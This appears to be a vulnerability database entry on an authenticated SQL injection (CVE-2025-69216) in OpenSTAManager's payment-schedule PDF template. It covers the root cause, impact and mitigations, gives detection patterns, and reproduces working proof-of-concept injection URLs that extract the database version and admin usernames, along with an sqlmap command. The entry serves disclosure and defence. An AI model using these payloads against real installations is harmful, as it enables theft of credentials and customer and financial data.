
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-69216 is an authenticated SQL injection vulnerability in OpenSTAManager's Scadenzario (Payment Schedule) print template, affecting all versions up to and including 2.9.8. The flaw allows any authenticated user — regardless of privilege level — to extract sensitive data from the database, including admin credentials, customer information, and financial records. It was disclosed on February 6, 2026, by researcher Łukasz Rybak via a GitHub Security Advisory. The vulnerability carries a CVSS v3.1 score of 6.5 (Medium) and a CVSS v4.0 score of 8.7 (High) (GitHub Advisory, OSM Advisory).
The root cause is CWE-89 (Improper Neutralization of Special Elements used in an SQL Command). In templates/scadenzario/init.php at line 46, the id_anagrafica parameter retrieved via the get() function is directly concatenated into an SQL query string without using the application's prepare() sanitization function or any input validation:
if (get('id_anagrafica') && get('id_anagrafica') != 'null') {
$module_query = str_replace('1=1', '1=1 AND `co_scadenziario`.`idanagrafica`="'.get('id_anagrafica').'"', $module_query);
$id_anagrafica = get('id_anagrafica');
}The vulnerable endpoint is /pdfgen.php?ptype=scadenzario&id_anagrafica=[PAYLOAD], accessible via HTTP GET. Similar unsanitized patterns also exist at lines 34 and 40 for date parameters. The injection supports error-based, boolean-based blind, and time-based blind techniques, all confirmed by SQLMap (OSM Advisory).
Successful exploitation grants complete read access to the OpenSTAManager database, enabling extraction of admin usernames, bcrypt password hashes, email addresses, customer records, and financial data. Any authenticated user — including those with minimal permissions — can escalate their effective data access to administrator level. While the CVSS v3.1 score reflects only confidentiality impact (no integrity or availability loss from the injection itself), the exposure of admin credentials creates a pathway for full application compromise and potential lateral movement (GitHub Advisory, OSM Advisory).
A detailed proof-of-concept (PoC) is publicly available in the GitHub Security Advisory, including specific crafted URLs and SQLMap commands demonstrating error-based, boolean-based blind, and time-based blind injection. The exploit was also indexed by Sploitus. The EPSS score is approximately 0.015% (3rd percentile), indicating low current exploitation probability. There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA KEV catalog (GitHub Advisory, OSM Advisory).
GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20--%20A SQL syntax error in the response confirms the vulnerability.EXTRACTVALUE:GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))%20AND%20%221%22=%221GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,database(),0x7e))%20AND%20%221%22=%221zz_users table:GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221sqlmap -r sqli_osm.req --level 3 --risk 3 --dbsWhere sqli_osm.req contains the GET request with a valid PHPSESSID session cookie and the id_anagrafica=1* parameter marked for injection./pdfgen.php with ptype=scadenzario and id_anagrafica values containing SQL keywords (EXTRACTVALUE, CONCAT, SELECT, UNION, SLEEP, AND, --), URL-encoded SQL syntax (%22, %20AND%20, %27), or hex-encoded strings (0x7e)./pdfgen.php?ptype=scadenzario&id_anagrafica= with varying payloads; PHP error logs containing MySQL XPATH syntax errors or EXTRACTVALUE function errors indicating error-based injection attempts.zz_users, co_scadenziario, or other sensitive tables originating from the web application process; queries containing EXTRACTVALUE, GTID_SUBSET, or SLEEP() functions.As of the advisory publication date, no patched version has been officially released — the advisory lists "None" for patched versions, meaning all installations running version 2.9.8 and earlier remain vulnerable. The recommended immediate mitigations are: (1) restrict access to the /pdfgen.php endpoint and the Scadenzario print functionality to trusted users only; (2) implement network-level controls (firewall, VPN) to limit who can reach the OpenSTAManager application; (3) deploy WAF rules to detect and block SQL injection patterns targeting the id_anagrafica parameter; and (4) monitor database and web server logs for anomalous query patterns. Organizations should monitor the OpenSTAManager repository for a patched release and upgrade immediately when available (GitHub Advisory, OSM Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."